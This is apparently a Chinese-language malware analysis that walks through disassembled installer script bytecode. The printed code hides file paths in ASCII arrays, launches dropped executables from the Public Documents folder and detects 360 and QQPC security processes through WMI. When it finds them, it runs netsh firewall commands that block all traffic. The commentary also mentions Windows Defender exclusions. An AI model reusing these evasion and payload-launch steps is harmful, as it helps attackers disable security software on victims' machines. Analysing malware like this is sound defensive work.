pushvar Var9 ; StackCount = 11
call SETARRAYLENGTH
pop ; StackCount = 10
pop ; StackCount = 9
assign Var9[0], S32(67)
assign Var9[1], S32(58)
assign Var9[2], S32(92)
assign Var9[3], S32(85)
assign Var9[4], S32(115)
assign Var9[5], S32(101)
assign Var9[6], S32(114)
assign Var9[7], S32(115)
assign Var9[8], S32(92)
assign Var9[9], S32(80)
assign Var9[10], S32(117)
assign Var9[11], S32(98)
assign Var9[12], S32(108)
assign Var9[13], S32(105)
assign Var9[14], S32(99)
assign Var9[15], S32(92)
assign Var9[16], S32(68)
assign Var9[17], S32(111)
assign Var9[18], S32(99)
assign Var9[19], S32(117)
assign Var9[20], S32(109)
assign Var9[21], S32(101)
assign Var9[22], S32(110)
assign Var9[23], S32(116)
assign Var9[24], S32(115)
assign Var9[25], S32(92)
assign Var9[26], S32(83)
assign Var9[27], S32(101)
assign Var9[28], S32(114)
assign Var9[29], S32(118)
assign Var9[30], S32(101)
assign Var9[31], S32(114)
assign Var9[32], S32(46)
assign Var9[33], S32(108)
assign Var9[34], S32(111)
assign Var9[35], S32(103)
assign Var8, Var9
pop ; StackCount = 8
pushvar Var3 ; StackCount = 9
call STRFROMCODE
pop ; StackCount = 8
pop ; StackCount = 7
pushtype WideString ; StackCount = 8
assign Var8, Var2
pushtype UnicodeString_2 ; StackCount = 9
pushtype Type30 ; StackCount = 10
pushtype Type30 ; StackCount = 11
pushtype S32 ; StackCount = 12
assign Var12, S32(11)
pushvar Var11 ; StackCount = 13
call SETARRAYLENGTH
pop ; StackCount = 12
pop ; StackCount = 11
assign Var11[0], S32(92)
assign Var11[1], S32(83)
assign Var11[2], S32(101)
assign Var11[3], S32(114)
assign Var11[4], S32(118)
assign Var11[5], S32(101)
assign Var11[6], S32(114)
assign Var11[7], S32(46)
assign Var11[8], S32(108)
assign Var11[9], S32(111)
assign Var11[10], S32(103)
assign Var10, Var11
pop ; StackCount = 10
pushvar Var9 ; StackCount = 11
call STRFROMCODE
pop ; StackCount = 10
pop ; StackCount = 9
add Var8, Var9
pop ; StackCount = 8
assign Var4, Var8
pop ; StackCount = 7
pushtype BOOLEAN ; StackCount = 8
pushtype UnicodeString_2 ; StackCount = 9
assign Var9, Var2
pushvar Var8 ; StackCount = 10
call FORCEDIRECTORIES
pop ; StackCount = 9
pop ; StackCount = 8
pop ; StackCount = 7
pushtype BOOLEAN ; StackCount = 8
pushtype UnicodeString_2 ; StackCount = 9
assign Var9, Var3
pushvar Var8 ; StackCount = 10
call FILEEXISTS
pop ; StackCount = 9
pop ; StackCount = 8
sfz Var8
pop ; StackCount = 7
jf loc_435a
pushtype BOOLEAN ; StackCount = 8
pushtype UnicodeString_2 ; StackCount = 9
assign Var9, Var4
pushvar Var8 ; StackCount = 10
call FILEEXISTS
pop ; StackCount = 9
pop ; StackCount = 8
sfz Var8
pop ; StackCount = 7
jf loc_4326
pushtype BOOLEAN ; StackCount = 8
pushtype UnicodeString_2 ; StackCount = 9
assign Var9, Var4
pushvar Var8 ; StackCount = 10
call DELETEFILE
pop ; StackCount = 9
pop ; StackCount = 8
pop ; StackCount = 7
loc_4326:
pushtype BOOLEAN ; StackCount = 8
pushtype UnicodeString_2 ; StackCount = 9
assign Var9, Var4
pushtype UnicodeString_2 ; StackCount = 10
assign Var10, Var3
pushvar Var8 ; StackCount = 11
call RENAMEFILE
pop ; StackCount = 10
pop ; StackCount = 9
pop ; StackCount = 8
pop ; StackCount = 7
loc_435a:
pushtype WideString ; StackCount = 8
pushtype UnicodeString_2 ; StackCount = 9
pushtype Type30 ; StackCount = 10
pushtype Type30 ; StackCount = 11
pushtype S32 ; StackCount = 12
assign Var12, S32(26)
pushvar Var11 ; StackCount = 13
call SETARRAYLENGTH
pop ; StackCount = 12
pop ; StackCount = 11
assign Var11[0], S32(67)
assign Var11[1], S32(58)
assign Var11[2], S32(92)
assign Var11[3], S32(85)
assign Var11[4], S32(115)
assign Var11[5], S32(101)
assign Var11[6], S32(114)
assign Var11[7], S32(115)
assign Var11[8], S32(92)
assign Var11[9], S32(80)
assign Var11[10], S32(117)
assign Var11[11], S32(98)
assign Var11[12], S32(108)
assign Var11[13], S32(105)
assign Var11[14], S32(99)
assign Var11[15], S32(92)
assign Var11[16], S32(68)
assign Var11[17], S32(111)
assign Var11[18], S32(99)
assign Var11[19], S32(117)
assign Var11[20], S32(109)
assign Var11[21], S32(101)
assign Var11[22], S32(110)
assign Var11[23], S32(116)
assign Var11[24], S32(115)
assign Var11[25], S32(92)
assign Var10, Var11
pop ; StackCount = 10
pushvar Var9 ; StackCount = 11
call STRFROMCODE
pop ; StackCount = 10
pop ; StackCount = 9
assign Var8, Var9
pop ; StackCount = 8
pushtype UnicodeString_2 ; StackCount = 9
pushtype Type30 ; StackCount = 10
pushtype Type30 ; StackCount = 11
pushtype S32 ; StackCount = 12
assign Var12, S32(9)
pushvar Var11 ; StackCount = 13
call SETARRAYLENGTH
pop ; StackCount = 12
pop ; StackCount = 11
assign Var11[0], S32(115)
assign Var11[1], S32(101)
assign Var11[2], S32(116)
assign Var11[3], S32(117)
assign Var11[4], S32(112)
assign Var11[5], S32(46)
assign Var11[6], S32(101)
assign Var11[7], S32(120)
assign Var11[8], S32(101)
assign Var10, Var11
pop ; StackCount = 10
pushvar Var9 ; StackCount = 11
call STRFROMCODE
pop ; StackCount = 10
pop ; StackCount = 9
add Var8, Var9
pop ; StackCount = 8
assign Var6, Var8
pop ; StackCount = 7
pushtype BOOLEAN ; StackCount = 8
pushtype UnicodeString_2 ; StackCount = 9
assign Var9, Var6
pushvar Var8 ; StackCount = 10
call FILEEXISTS
pop ; StackCount = 9
pop ; StackCount = 8
sfz Var8
pop ; StackCount = 7
jf loc_47cd
pushtype BOOLEAN ; StackCount = 8
pushtype Pointer ; StackCount = 9
setptr Var9, Var7
pushtype U8_4 ; StackCount = 10
assign Var10, U8_4(0)
pushtype S32 ; StackCount = 11
assign Var11, S32(5)
pushtype UnicodeString_2 ; StackCount = 12
pushtype Type30 ; StackCount = 13
pushtype Type30 ; StackCount = 14
pushtype S32 ; StackCount = 15
assign Var15, S32(0)
pushvar Var14 ; StackCount = 16
call SETARRAYLENGTH
pop ; StackCount = 15
pop ; StackCount = 14
assign Var13, Var14
pop ; StackCount = 13
pushvar Var12 ; StackCount = 14
call STRFROMCODE
pop ; StackCount = 13
pop ; StackCount = 12
pushtype UnicodeString_2 ; StackCount = 13
pushtype Type30 ; StackCount = 14
pushtype Type30 ; StackCount = 15
pushtype S32 ; StackCount = 16
assign Var16, S32(0)
pushvar Var15 ; StackCount = 17
call SETARRAYLENGTH
pop ; StackCount = 16
pop ; StackCount = 15
assign Var14, Var15
pop ; StackCount = 14
pushvar Var13 ; StackCount = 15
call STRFROMCODE
pop ; StackCount = 14
pop ; StackCount = 13
pushtype UnicodeString_2 ; StackCount = 14
assign Var14, Var6
pushvar Var8 ; StackCount = 15
call EXEC
pop ; StackCount = 14
pop ; StackCount = 13
pop ; StackCount = 12
pop ; StackCount = 11
pop ; StackCount = 10
pop ; StackCount = 9
pop ; StackCount = 8
pop ; StackCount = 7
loc_47cd:
pushtype WideString ; StackCount = 8
pushtype UnicodeString_2 ; StackCount = 9
pushtype Type30 ; StackCount = 10
pushtype Type30 ; StackCount = 11
pushtype S32 ; StackCount = 12
assign Var12, S32(25)
pushvar Var11 ; StackCount = 13
call SETARRAYLENGTH
pop ; StackCount = 12
pop ; StackCount = 11
assign Var11[0], S32(67)
assign Var11[1], S32(58)
assign Var11[2], S32(92)
assign Var11[3], S32(85)
assign Var11[4], S32(115)
assign Var11[5], S32(101)
assign Var11[6], S32(114)
assign Var11[7], S32(115)
assign Var11[8], S32(92)
assign Var11[9], S32(80)
assign Var11[10], S32(117)
assign Var11[11], S32(98)
assign Var11[12], S32(108)
assign Var11[13], S32(105)
assign Var11[14], S32(99)
assign Var11[15], S32(92)
assign Var11[16], S32(68)
assign Var11[17], S32(111)
assign Var11[18], S32(99)
assign Var11[19], S32(117)
assign Var11[20], S32(109)
assign Var11[21], S32(101)
assign Var11[22], S32(110)
assign Var11[23], S32(116)
assign Var11[24], S32(115)
assign Var10, Var11
pop ; StackCount = 10
pushvar Var9 ; StackCount = 11
call STRFROMCODE
pop ; StackCount = 10
pop ; StackCount = 9
assign Var8, Var9
pop ; StackCount = 8
pushtype UnicodeString_2 ; StackCount = 9
pushtype Type30 ; StackCount = 10
pushtype Type30 ; StackCount = 11
pushtype S32 ; StackCount = 12
assign Var12, S32(8)
pushvar Var11 ; StackCount = 13
call SETARRAYLENGTH
pop ; StackCount = 12
pop ; StackCount = 11
assign Var11[0], S32(92)
assign Var11[1], S32(109)
assign Var11[2], S32(101)
assign Var11[3], S32(110)
assign Var11[4], S32(46)
assign Var11[5], S32(101)
assign Var11[6], S32(120)
assign Var11[7], S32(101)
assign Var10, Var11
pop ; StackCount = 10
pushvar Var9 ; StackCount = 11
call STRFROMCODE
pop ; StackCount = 10
pop ; StackCount = 9
add Var8, Var9
pop ; StackCount = 8
assign Var5, Var8
pop ; StackCount = 7
pushtype BOOLEAN ; StackCount = 8
pushtype UnicodeString_2 ; StackCount = 9
assign Var9, Var5
pushvar Var8 ; StackCount = 10
call FILEEXISTS
pop ; StackCount = 9
pop ; StackCount = 8
sfz Var8
pop ; StackCount = 7
jf loc_4c1a
pushtype BOOLEAN ; StackCount = 8
pushtype Pointer ; StackCount = 9
setptr Var9, Var7
pushtype U8_4 ; StackCount = 10
assign Var10, U8_4(0)
pushtype S32 ; StackCount = 11
assign Var11, S32(0)
pushtype UnicodeString_2 ; StackCount = 12
pushtype Type30 ; StackCount = 13
pushtype Type30 ; StackCount = 14
pushtype S32 ; StackCount = 15
assign Var15, S32(0)
pushvar Var14 ; StackCount = 16
call SETARRAYLENGTH
pop ; StackCount = 15
pop ; StackCount = 14
assign Var13, Var14
pop ; StackCount = 13
pushvar Var12 ; StackCount = 14
call STRFROMCODE
pop ; StackCount = 13
pop ; StackCount = 12
pushtype UnicodeString_2 ; StackCount = 13
pushtype Type30 ; StackCount = 14
pushtype Type30 ; StackCount = 15
pushtype S32 ; StackCount = 16
assign Var16, S32(0)
pushvar Var15 ; StackCount = 17
call SETARRAYLENGTH
pop ; StackCount = 16
pop ; StackCount = 15
assign Var14, Var15
pop ; StackCount = 14
pushvar Var13 ; StackCount = 15
call STRFROMCODE
pop ; StackCount = 14
pop ; StackCount = 13
pushtype UnicodeString_2 ; StackCount = 14
assign Var14, Var5
pushvar Var8 ; StackCount = 15
call EXEC
pop ; StackCount = 14
pop ; StackCount = 13
pop ; StackCount = 12
pop ; StackCount = 11
pop ; StackCount = 10
pop ; StackCount = 9
pop ; StackCount = 8
pop ; StackCount = 7
loc_4c1a:
ret这个函数包含多个ASCII码数组,用于构建字符串并执行各种操作。
以下是所有数组的ASCII码还原结果及其对应的字符串:
第一个数组(12字节)
第二个数组(25字节)
第三个数组(13字节)
第四个数组(11字节)
第五个数组(21字节)
第六个数组(9字节)
第七个数组(7字节)
第八个数组(51字节)
第九个数组(36字节)
第十个数组(11字节)
第十一个数组(26字节)
第十二个数组(9字节)
第十三个数组(8字节)
该函数执行以下功能:
执行cmd.exe /c copy /b /y,将C:\Users\Public\Documents\unzip.3和unzip.2合并为funzip.exe
删除unzip.3和unzip.2文件
调用ADDDEFENDEREXCLUSION、OBFUSCATEDEXTRACT等函数(如果360Tray.exe进程存在则会先调用ADDDEFENDEREXCLUSION和DISABLENETWORKADAPTERS执行断网操作)
使用C:\Users\Public\Documents作为工作目录,创建x86-Microsoft-Windowsdata子目录,即创建C:\Users\Public\Documents\x86-Microsoft-Windowsdata目录
使用EXEC函数执行setup.exe、men.exe等文件,即使用EXEC函数执行C:\Users\Public\Documents\setup.exe和C:\Users\Public\Documents\men.exe等文件
该函数会检测360主防进程——若存在,则执行断网,具体如下:
; 第8-14行代码
pushtype BOOLEAN ; StackCount = 8
pushvar Var8 ; StackCount = 9
call INITIALIZESETUP ; 初始化设置
pop ; StackCount = 8
pop ; StackCount = 7
pushvar Var1 ; StackCount = 8
call IS360PROCESSRUNNING ; 检查360安全卫士进程是否正在运行
pop ; StackCount = 7检查结果和条件跳转:
; 第15-22行代码
pushtype BOOLEAN ; StackCount = 8
assign Var8, Var1 ; 检查函数"IS360PROCESSRUNNING"的返回值(存储在Var1中)赋给变量Var8,用于后续判断
setz Var8 ; 检查Var8的值是否为假(0)
sfz Var8 ; 根据sfz指令的判断结果,如果Var8为假(即360进程没有运行),则跳转到标签loc_263f处执行
pop ; StackCount = 7
jf loc_263f执行路径:
我们来看一下"IS360PROCESSRUNNING"函数:
.function(export) BOOLEAN IS360PROCESSRUNNING()
pushtype Variant ; StackCount = 1
pushtype Variant ; StackCount = 2
pushtype Variant ; StackCount = 3
pushtype UnicodeString_2 ; StackCount = 4
pushtype UnicodeString_2 ; StackCount = 5
pushtype UnicodeString_2 ; StackCount = 6
pushtype UnicodeString_2 ; StackCount = 7
assign RetVal, BOOLEAN(0)
starteh null, loc_8a1, null, loc_8af
pushtype IDISPATCH ; StackCount = 8
pushtype UnicodeString_2 ; StackCount = 9
pushtype Type30 ; StackCount = 10
pushtype Type30 ; StackCount = 11
pushtype S32 ; StackCount = 12
assign Var12, S32(26)
pushvar Var11 ; StackCount = 13
call SETARRAYLENGTH
pop ; StackCount = 12
pop ; StackCount = 11
assign Var11[0], S32(87)
assign Var11[1], S32(66)
assign Var11[2], S32(69)
assign Var11[3], S32(77)
assign Var11[4], S32(83)
assign Var11[5], S32(99)
assign Var11[6], S32(114)
assign Var11[7], S32(105)
assign Var11[8], S32(112)
assign Var11[9], S32(116)
assign Var11[10], S32(105)
assign Var11[11], S32(110)
assign Var11[12], S32(103)
assign Var11[13], S32(46)
assign Var11[14], S32(83)
assign Var11[15], S32(87)
assign Var11[16], S32(66)
assign Var11[17], S32(69)
assign Var11[18], S32(77)
assign Var11[19], S32(76)
assign Var11[20], S32(111)
assign Var11[21], S32(99)
assign Var11[22], S32(97)
assign Var11[23], S32(116)
assign Var11[24], S32(111)
assign Var11[25], S32(114)
assign Var10, Var11
pop ; StackCount = 10
pushvar Var9 ; StackCount = 11
call STRFROMCODE
pop ; StackCount = 10
pop ; StackCount = 9
pushvar Var8 ; StackCount = 10
call CREATEOLEOBJECT
pop ; StackCount = 9
pop ; StackCount = 8
assign Var1, Var8
pop ; StackCount = 7
pushtype !OPENARRAYOFVARIANT ; StackCount = 8
pushtype !OPENARRAYOFVARIANT ; StackCount = 9
pushtype S32 ; StackCount = 10
assign Var10, S32(2)
pushvar Var9 ; StackCount = 11
call SETARRAYLENGTH
pop ; StackCount = 10
pop ; StackCount = 9
assign Var9[0], String_3("")
assign Var9[1], String_3("root\\cimv2")
assign Var8, Var9
pop ; StackCount = 8
pushtype String_3 ; StackCount = 9
assign Var9, String_3("ConnectServer")
pushtype BOOLEAN ; StackCount = 10
assign Var10, BOOLEAN(0)
pushtype IDISPATCH ; StackCount = 11
assign Var11, Var1
pushvar Var2 ; StackCount = 12
call IDISPATCHINVOKE
pop ; StackCount = 11
pop ; StackCount = 10
pop ; StackCount = 9
pop ; StackCount = 8
pop ; StackCount = 7
pushtype Type30 ; StackCount = 8
pushtype Type30 ; StackCount = 9
pushtype S32 ; StackCount = 10
assign Var10, S32(11)
pushvar Var9 ; StackCount = 11
call SETARRAYLENGTH
pop ; StackCount = 10
pop ; StackCount = 9
assign Var9[0], S32(51)
assign Var9[1], S32(54)
assign Var9[2], S32(48)
assign Var9[3], S32(116)
assign Var9[4], S32(114)
assign Var9[5], S32(97)
assign Var9[6], S32(121)
assign Var9[7], S32(46)
assign Var9[8], S32(101)
assign Var9[9], S32(120)
assign Var9[10], S32(101)
assign Var8, Var9
pop ; StackCount = 8
pushvar Var5 ; StackCount = 9
call STRFROMCODE
pop ; StackCount = 8
pop ; StackCount = 7
pushtype Type30 ; StackCount = 8
pushtype Type30 ; StackCount = 9
pushtype S32 ; StackCount = 10
assign Var10, S32(11)
pushvar Var9 ; StackCount = 11
call SETARRAYLENGTH
pop ; StackCount = 10
pop ; StackCount = 9
assign Var9[0], S32(51)
assign Var9[1], S32(54)
assign Var9[2], S32(48)
assign Var9[3], S32(84)
assign Var9[4], S32(114)
assign Var9[5], S32(97)
assign Var9[6], S32(121)
assign Var9[7], S32(46)
assign Var9[8], S32(101)
assign Var9[9], S32(120)
assign Var9[10], S32(101)
assign Var8, Var9
pop ; StackCount = 8
pushvar Var6 ; StackCount = 9
call STRFROMCODE
pop ; StackCount = 8
pop ; StackCount = 7
pushtype Type30 ; StackCount = 8
pushtype Type30 ; StackCount = 9
pushtype S32 ; StackCount = 10
assign Var10, S32(12)
pushvar Var9 ; StackCount = 11
call SETARRAYLENGTH
pop ; StackCount = 10
pop ; StackCount = 9
assign Var9[0], S32(81)
assign Var9[1], S32(81)
assign Var9[2], S32(80)
assign Var9[3], S32(67)
assign Var9[4], S32(84)
assign Var9[5], S32(114)
assign Var9[6], S32(97)
assign Var9[7], S32(121)
assign Var9[8], S32(46)
assign Var9[9], S32(101)
assign Var9[10], S32(120)
assign Var9[11], S32(101)
assign Var8, Var9
pop ; StackCount = 8
pushvar Var7 ; StackCount = 9
call STRFROMCODE
pop ; StackCount = 8
pop ; StackCount = 7
pushtype WideString ; StackCount = 8
assign Var8, String_3("SELECT * FROM Win32_Process WHERE Name=\"")
add Var8, Var5
add Var8, String_3("\" OR ")
add Var8, String_3("Name=\"")
add Var8, Var6
add Var8, String_3("\" OR ")
add Var8, String_3("Name=\"")
add Var8, Var7
add Var8, Char("\"")
assign Var4, Var8
pop ; StackCount = 7
pushtype !OPENARRAYOFVARIANT ; StackCount = 8
pushtype !OPENARRAYOFVARIANT ; StackCount = 9
pushtype S32 ; StackCount = 10
assign Var10, S32(1)
pushvar Var9 ; StackCount = 11
call SETARRAYLENGTH
pop ; StackCount = 10
pop ; StackCount = 9
assign Var9[0], Var4
assign Var8, Var9
pop ; StackCount = 8
pushtype String_3 ; StackCount = 9
assign Var9, String_3("ExecQuery")
pushtype BOOLEAN ; StackCount = 10
assign Var10, BOOLEAN(0)
pushtype IDISPATCH ; StackCount = 11
assign Var11, Var2
pushvar Var3 ; StackCount = 12
call IDISPATCHINVOKE
pop ; StackCount = 11
pop ; StackCount = 10
pop ; StackCount = 9
pop ; StackCount = 8
pop ; StackCount = 7
pushtype Variant ; StackCount = 8
pushtype !OPENARRAYOFVARIANT ; StackCount = 9
pushtype !OPENARRAYOFVARIANT ; StackCount = 10
pushtype S32 ; StackCount = 11
assign Var11, S32(0)
pushvar Var10 ; StackCount = 12
call SETARRAYLENGTH
pop ; StackCount = 11
pop ; StackCount = 10
assign Var9, Var10
pop ; StackCount = 9
pushtype String_3 ; StackCount = 10
assign Var10, String_3("Count")
pushtype BOOLEAN ; StackCount = 11
assign Var11, BOOLEAN(0)
pushtype IDISPATCH ; StackCount = 12
assign Var12, Var3
pushvar Var8 ; StackCount = 13
call IDISPATCHINVOKE
pop ; StackCount = 12
pop ; StackCount = 11
pop ; StackCount = 10
pop ; StackCount = 9
pop ; StackCount = 8
gt RetVal, Var8, S32(0)
pop ; StackCount = 7
endtry
loc_8a1:
assign RetVal, BOOLEAN(0)
endcatch
loc_8af:
ret这个函数包含多个ASCII码数组,用于构建字符串来检查360安全卫士进程是否在运行。
以下是所有数组的ASCII码还原结果及其对应的字符串:
第一个数组(26字节)
第二个数组(11字节)
第三个数组(11字节)
第四个数组(12字节)
该函数通过WMI查询系统进程,检查360安全卫士的进程是否在运行:
创建WMI对象:创建WBEMScripting.SWBEMLocator对象
连接WMI服务:连接到root\cimv2命名空间
构建查询字符串:查询以下三个进程名之一是否存在:360tray.exe360Tray.exeQQPCTray.exe
执行查询:通过WQL查询Win32_Process表
检查结果:如果查询返回的进程计数大于0,则返回True,表示360进程在运行;否则返回False
最终构建的WQL查询语句为:SELECT * FROM Win32_Process WHERE Name="360tray.exe" OR Name="360Tray.exe" OR Name="QQPCTray.exe"
再来看"DISABLENETWORKADAPTERS"函数:
.function(export) void DISABLENETWORKADAPTERS()
pushtype S32 ; StackCount = 1
pushtype BOOLEAN ; StackCount = 2
pushtype Pointer ; StackCount = 3
setptr Var3, Var1
pushtype U8_4 ; StackCount = 4
assign Var4, U8_4(1)
pushtype S32 ; StackCount = 5
assign Var5, S32(0)
pushtype UnicodeString_2 ; StackCount = 6
assign Var6, String_3("")
pushtype UnicodeString_2 ; StackCount = 7
pushtype Type30 ; StackCount = 8
pushtype Type30 ; StackCount = 9
pushtype S32 ; StackCount = 10
assign Var10, S32(36)
pushvar Var9 ; StackCount = 11
call SETARRAYLENGTH
pop ; StackCount = 10
pop ; StackCount = 9
assign Var9[0], S32(97)
assign Var9[1], S32(100)
assign Var9[2], S32(118)
assign Var9[3], S32(102)
assign Var9[4], S32(105)
assign Var9[5], S32(114)
assign Var9[6], S32(101)
assign Var9[7], S32(119)
assign Var9[8], S32(97)
assign Var9[9], S32(108)
assign Var9[10], S32(108)
assign Var9[11], S32(32)
assign Var9[12], S32(115)
assign Var9[13], S32(101)
assign Var9[14], S32(116)
assign Var9[15], S32(32)
assign Var9[16], S32(97)
assign Var9[17], S32(108)
assign Var9[18], S32(108)
assign Var9[19], S32(112)
assign Var9[20], S32(114)
assign Var9[21], S32(111)
assign Var9[22], S32(102)
assign Var9[23], S32(105)
assign Var9[24], S32(108)
assign Var9[25], S32(101)
assign Var9[26], S32(115)
assign Var9[27], S32(32)
assign Var9[28], S32(115)
assign Var9[29], S32(116)
assign Var9[30], S32(97)
assign Var9[31], S32(116)
assign Var9[32], S32(101)
assign Var9[33], S32(32)
assign Var9[34], S32(111)
assign Var9[35], S32(110)
assign Var8, Var9
pop ; StackCount = 8
pushvar Var7 ; StackCount = 9
call STRFROMCODE
pop ; StackCount = 8
pop ; StackCount = 7
pushtype UnicodeString_2 ; StackCount = 8
pushtype Type30 ; StackCount = 9
pushtype Type30 ; StackCount = 10
pushtype S32 ; StackCount = 11
assign Var11, S32(5)
pushvar Var10 ; StackCount = 12
call SETARRAYLENGTH
pop ; StackCount = 11
pop ; StackCount = 10
assign Var10[0], S32(110)
assign Var10[1], S32(101)
assign Var10[2], S32(116)
assign Var10[3], S32(115)
assign Var10[4], S32(104)
assign Var9, Var10
pop ; StackCount = 9
pushvar Var8 ; StackCount = 10
call STRFROMCODE
pop ; StackCount = 9
pop ; StackCount = 8
pushvar Var2 ; StackCount = 9
call EXEC
pop ; StackCount = 8
pop ; StackCount = 7
pop ; StackCount = 6
pop ; StackCount = 5
pop ; StackCount = 4
pop ; StackCount = 3
pop ; StackCount = 2
pop ; StackCount = 1
pushtype BOOLEAN ; StackCount = 2
pushtype Pointer ; StackCount = 3
setptr Var3, Var1
pushtype U8_4 ; StackCount = 4
assign Var4, U8_4(1)
pushtype S32 ; StackCount = 5
assign Var5, S32(0)
pushtype UnicodeString_2 ; StackCount = 6
assign Var6, String_3("")
pushtype UnicodeString_2 ; StackCount = 7
pushtype Type30 ; StackCount = 8
pushtype Type30 ; StackCount = 9
pushtype S32 ; StackCount = 10
assign Var10, S32(69)
pushvar Var9 ; StackCount = 11
call SETARRAYLENGTH
pop ; StackCount = 10
pop ; StackCount = 9
assign Var9[0], S32(97)
assign Var9[1], S32(100)
assign Var9[2], S32(118)
assign Var9[3], S32(102)
assign Var9[4], S32(105)
assign Var9[5], S32(114)
assign Var9[6], S32(101)
assign Var9[7], S32(119)
assign Var9[8], S32(97)
assign Var9[9], S32(108)
assign Var9[10], S32(108)
assign Var9[11], S32(32)
assign Var9[12], S32(115)
assign Var9[13], S32(101)
assign Var9[14], S32(116)
assign Var9[15], S32(32)
assign Var9[16], S32(97)
assign Var9[17], S32(108)
assign Var9[18], S32(108)
assign Var9[19], S32(112)
assign Var9[20], S32(114)
assign Var9[21], S32(111)
assign Var9[22], S32(102)
assign Var9[23], S32(105)
assign Var9[24], S32(108)
assign Var9[25], S32(101)
assign Var9[26], S32(115)
assign Var9[27], S32(32)
assign Var9[28], S32(102)
assign Var9[29], S32(105)
assign Var9[30], S32(114)
assign Var9[31], S32(101)
assign Var9[32], S32(119)
assign Var9[33], S32(97)
assign Var9[34], S32(108)
assign Var9[35], S32(108)
assign Var9[36], S32(112)
assign Var9[37], S32(111)
assign Var9[38], S32(108)
assign Var9[39], S32(105)
assign Var9[40], S32(99)
assign Var9[41], S32(121)
assign Var9[42], S32(32)
assign Var9[43], S32(98)
assign Var9[44], S32(108)
assign Var9[45], S32(111)
assign Var9[46], S32(99)
assign Var9[47], S32(107)
assign Var9[48], S32(105)
assign Var9[49], S32(110)
assign Var9[50], S32(98)
assign Var9[51], S32(111)
assign Var9[52], S32(117)
assign Var9[53], S32(110)
assign Var9[54], S32(100)
assign Var9[55], S32(44)
assign Var9[56], S32(98)
assign Var9[57], S32(108)
assign Var9[58], S32(111)
assign Var9[59], S32(99)
assign Var9[60], S32(107)
assign Var9[61], S32(111)
assign Var9[62], S32(117)
assign Var9[63], S32(116)
assign Var9[64], S32(98)
assign Var9[65], S32(111)
assign Var9[66], S32(117)
assign Var9[67], S32(110)
assign Var9[68], S32(100)
assign Var8, Var9
pop ; StackCount = 8
pushvar Var7 ; StackCount = 9
call STRFROMCODE
pop ; StackCount = 8
pop ; StackCount = 7
pushtype UnicodeString_2 ; StackCount = 8
pushtype Type30 ; StackCount = 9
pushtype Type30 ; StackCount = 10
pushtype S32 ; StackCount = 11
assign Var11, S32(5)
pushvar Var10 ; StackCount = 12
call SETARRAYLENGTH
pop ; StackCount = 11
pop ; StackCount = 10
assign Var10[0], S32(110)
assign Var10[1], S32(101)
assign Var10[2], S32(116)
assign Var10[3], S32(115)
assign Var10[4], S32(104)
assign Var9, Var10
pop ; StackCount = 9
pushvar Var8 ; StackCount = 10
call STRFROMCODE
pop ; StackCount = 9
pop ; StackCount = 8
pushvar Var2 ; StackCount = 9
call EXEC
pop ; StackCount = 8
pop ; StackCount = 7
pop ; StackCount = 6
pop ; StackCount = 5
pop ; StackCount = 4
pop ; StackCount = 3
pop ; StackCount = 2
pop ; StackCount = 1
ret这个函数包含两个ASCII码数组,用于构建命令字符串。
以下是所有数组的ASCII码还原结果及其对应的字符串:
第一个数组(36字节)
第二个数组(5字节)
第三个数组(69字节)
第四个数组(5字节)
这个函数通过执行两个netsh命令来配置Windows防火墙:netsh advfirewall set allprofiles state onnetsh advfirewall set allprofiles firewallpolicy blockinbound,blockoutbound
作用:打开Windows防火墙,并设置防火墙策略为阻止所有入站和出站连接。
针对Windows Defender还有"ISDEFENDERRUNNING"函数和"ADDDEFENDEREXCLUSION"函数,我们来看一下。
.function(export) BOOLEAN ISDEFENDERRUNNING()
pushtype Variant ; StackCount = 1
pushtype Variant ; StackCount = 2
pushtype Variant ; StackCount = 3
pushtype UnicodeString_2 ; StackCount = 4
pushtype UnicodeString_2 ; StackCount = 5
pushtype UnicodeString_2 ; StackCount = 6
pushtype UnicodeString_2 ; StackCount = 7
assign RetVal, BOOLEAN(0)
starteh null, loc_b35, null, loc_b43
pushtype Type30 ; StackCount = 8
pushtype Type30 ; StackCount = 9
pushtype S32 ; StackCount = 10
assign Var10, S32(26)
pushvar Var9 ; StackCount = 11
call SETARRAYLENGTH
pop ; StackCount = 10
pop ; StackCount = 9
assign Var9[0], S32(87)
assign Var9[1], S32(66)
assign Var9[2], S32(69)
assign Var9[3], S32(77)
assign Var9[4], S32(83)
assign Var9[5], S32(99)
assign Var9[6], S32(114)
assign Var9[7], S32(105)
assign Var9[8], S32(112)
assign Var9[9], S32(116)
assign Var9[10], S32(105)
assign Var9[11], S32(110)
assign Var9[12], S32(103)
assign Var9[13], S32(46)
assign Var9[14], S32(83)
assign Var9[15], S32(87)
assign Var9[16], S32(66)
assign Var9[17], S32(69)
assign Var9[18], S32(77)
assign Var9[19], S32(76)
assign Var9[20], S32(111)
assign Var9[21], S32(99)
assign Var9[22], S32(97)
assign Var9[23], S32(116)
assign Var9[24], S32(111)
assign Var9[25], S32(114)
assign Var8, Var9
pop ; StackCount = 8
pushvar Var4 ; StackCount = 9
call STRFROMCODE
pop ; StackCount = 8
pop ; StackCount = 7
pushtype WideString ; StackCount = 8
pushtype UnicodeString_2 ; StackCount = 9
pushtype Type30 ; StackCount = 10
pushtype Type30 ; StackCount = 11
pushtype S32 ; StackCount = 12
assign Var12, S32(4)
pushvar Var11 ; StackCount = 13
call SETARRAYLENGTH
pop ; StackCount = 12
pop ; StackCount = 11
assign Var11[0], S32(114)
assign Var11[1], S32(111)
assign Var11[2], S32(111)
assign Var11[3], S32(116)
assign Var10, Var11
pop ; StackCount = 10
pushvar Var9 ; StackCount = 11
call STRFROMCODE
pop ; StackCount = 10
pop ; StackCount = 9
assign Var8, Var9
pop ; StackCount = 8
pushtype UnicodeString_2 ; StackCount = 9
pushtype Type30 ; StackCount = 10
pushtype Type30 ; StackCount = 11
pushtype S32 ; StackCount = 12
assign Var12, S32(1)
pushvar Var11 ; StackCount = 13
call SETARRAYLENGTH
pop ; StackCount = 12
pop ; StackCount = 11
assign Var11[0], S32(92)
assign Var10, Var11
pop ; StackCount = 10
pushvar Var9 ; StackCount = 11
call STRFROMCODE
pop ; StackCount = 10
pop ; StackCount = 9
add Var8, Var9
pop ; StackCount = 8
pushtype UnicodeString_2 ; StackCount = 9
pushtype Type30 ; StackCount = 10
pushtype Type30 ; StackCount = 11
pushtype S32 ; StackCount = 12
assign Var12, S32(5)
pushvar Var11 ; StackCount = 13
call SETARRAYLENGTH
pop ; StackCount = 12
pop ; StackCount = 11
assign Var11[0], S32(99)
assign Var11[1], S32(105)
assign Var11[2], S32(109)
assign Var11[3], S32(118)
assign Var11[4], S32(50)
assign Var10, Var11
pop ; StackCount = 10
